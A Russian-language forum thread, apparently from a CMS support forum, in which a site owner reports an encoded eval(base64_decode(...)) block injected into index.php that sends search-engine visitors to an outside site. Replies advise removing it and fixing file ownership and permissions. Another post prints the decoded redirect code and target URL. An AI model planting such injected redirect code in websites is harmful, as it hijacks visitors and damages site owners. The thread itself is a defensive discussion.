Идет редирект с моего сайта на какой-то левый. Вирус?

#1 19 мая 2012 в 15:14

В файле index.php обнаружил зашифрованный код, который и совершал редирект

<?php
/******************************************************************************/
//                                                                            //
//                             InstantCMS v1.9                                //
//                        http://instantcms.ru/                           //
//                                                                            //
//                   written by InstantCMS Team, 2007-2011                    //
//                produced by InstantSoft, (www.instantsoft.ru)               //
//                                                                            //
//                        LICENSED BY GNU/GPL v2                              //
//                                                                            //
/******************************************************************************/
[b]eval(base64_decode('aWYgKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSl7CiAgJHIgPSByYW5kKDEsMik7CiAgaWYgKCRyID09IDEpewogICRrZXkgPSBiYXNlNjRfZGVjb2RlKCdhSFIwY0Rv
dkwyZHZiR1JzYVc1bExXSnNiMmN1Y25VdloyOXNaR3hwYm1VdWNHaHcnKTsKICAkciA9IGV4cGxvZGUoJy8nLCAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOwogICRkID0g
ZXhwbG9kZSgnLicsICRyWzJdKTsKICBpZigkZFswXT09Ind3dyIpICRvPSRkWzFdOyBlbHNlICRvID0gJGRbMF07CiAgaWYgKCRvID09ICJnb29nbGUiIHx8ICRvID09ICJ5
YW5kZXgiIHx8ICRvID09ICJnbyIgfHwgJG8gPT0gInlhaG9vIiB8fCAkbyA9PSAicnUiIHx8ICRvID09ICJzZWFyY2giKXsKICAgIGhlYWRlcignSFRUUC8xLjEgMzAxIE1v
dmVkIFBlcm1hbmVudGx5Jyk7CiAgICBoZWFkZXIoJ0xvY2F0aW9uOicuJGtleSk7CiAgfQogIH0KfQ=='));[/b]
    Error_Reporting(E_ALL & ~E_NOTICE & ~E_WARNING);
    setlocale(LC_ALL, 'ru_RU.CP1251');
 
    define('PATH', $_SERVER['DOCUMENT_ROOT']);

Какое-то время сайт работает нормально, но потом в Index.php опять прописывается этот зашифрованный код. Как удалить его навсегда?

Лес

#2 19 мая 2012 в 15:31

lsv,
1. удалить этот код
2. проверить владельца файла — должен отличаться от того, под которым запускаются скрипты.
3. поставить права на файл 644 — чтобы никто кроме вас не смогу изменить файл (дописать, удалить и тд).

Проверить все файлы и папки сайта на права
1. владелец должен отличаться от того, под которым запускаются скрипты.
2. Права на папки 755, на файлы 644. Кроме тех папок, куда должна быть открыта записать (кэш, загрузка картинок).

оптимизирую помаленьку

#3 19 мая 2012 в 15:35

lsv, + поискать на сайте вирусы)
Какой-то скрипт дописывает вам эту пакость

оптимизирую помаленьку

Сегодня в 12:55

#4 20 мая 2012 в 12:14

if ($_SERVER['HTTP_REFERER']){
$r = rand(1,2);
if ($r == 1){
$key = base64_decode('aHR0cDovL2dvbGRsaW5lLWJsb2cucnUvZ29sZGxpbmUucGhw'); http: // goldline-blog. ru / goldline.php
$r = explode('/', $_SERVER['HTTP_REFERER']);
$d = explode('.', $r[2]);
if($d[0]=="www") $o=$d[1]; else $o = $d[0];
if ($o == "google" || $o == "yandex" || $o == "go" || $o == "yahoo" || $o == "ru" || $o == "search"){
header('HTTP/1.1 301 Moved Permanently');
header('Location:'.$key);
}
}
}
вот что там

Раньше РАЙ был везде - РАЙсовет, РАЙком, РАЙсобес...., а сейчас везде АДминистрации! Не надо давать людям советы. Каждый должен лохануться самостоятельно! Любишь в продакшн, люби и баги починить!